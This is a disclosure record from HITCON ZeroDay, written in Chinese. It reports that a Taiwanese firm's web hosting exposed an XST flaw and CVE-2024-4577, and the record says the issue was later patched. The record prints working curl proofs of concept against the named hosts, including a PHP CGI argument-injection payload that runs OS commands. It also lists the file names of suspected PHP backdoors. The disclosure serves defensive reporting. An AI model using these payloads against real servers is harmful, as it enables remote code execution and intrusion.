Vulnerability Overview

ZDID: ZD-2024-01409
發信 Vendor: 米梵數位設計團隊
Title: 米梵數位網站空間存在 XST + CVE-2024-4577 (PHP CGI parameter injection)
Introduction: 網站空間存在 XST + CVE-2024-4577 (PHP CGI parameter injection)

處理狀態

目前狀態

公開

Last Update : 2024/12/04

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2024/10/29 21:17:56 : 新提交 (由 BTtea 更新此狀態)
2024/10/29 21:21:57 : 新提交 (由 BTtea 更新此狀態)
2024/10/29 21:25:49 : 新提交 (由 BTtea 更新此狀態)
2024/10/31 13:28:09 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/11/09 12:09:43 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/11/09 12:09:43 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/11/26 11:44:20 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/12/04 03:00:31 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2024-01409
通報者：blacktea_player (BTtea)
風險：嚴重
類型：程式碼執行 (Code Execution)

參考資料

攻擊者可藉由此漏洞執行惡意程式碼，進行如操縱網站作業系統等惡意行為。

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

由於該頁面為網站空間，且 Apache 的目錄瀏覽有開啟，導致多個網頁易受攻擊

XST

由於 HTTP 可接受 TRACE 過舊的協議，可利用於 XST 攻擊
```
curl -i "http://www.tdea.com.tw" -X TRACE -H "XST: <script>alert(1)</script>"
```
運行結果

CVE-2024-4577 (PHP CGI parameter injection)

由於使用舊版的 xampp，其存在此CVE弱點，可經由下方網址注入惡意參數來達到遠端命令執行 (在linux中輸入下方指令)

curl -o - "http://chnh.moi.meefun.com.tw/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_append_file%3dphp://input" --data '<?=`whoami & dir`;?>'

執行結果

發現在8月時就有被入侵的痕跡，建議清查所有子網站檔案是否有藏PHP後門

在 C:\xampp\php 底下

2kPEsToERSYgN1UvT8s484lvMyYbasesss.php
2kVViTAkrdxZuxwVx9UsQhQ6waGbasesss.php
t2xmlchk.php

根據此利用，此 CVE CVSS 3.1 分數為 9.8 分
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE 類型 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
https://cwe.mitre.org/data/definitions/78.html

參考資料
https://nvd.nist.gov/vuln/detail/CVE-2024-4577/change-record?changeRecordedOn=06/09/2024T16:15:09.550-0400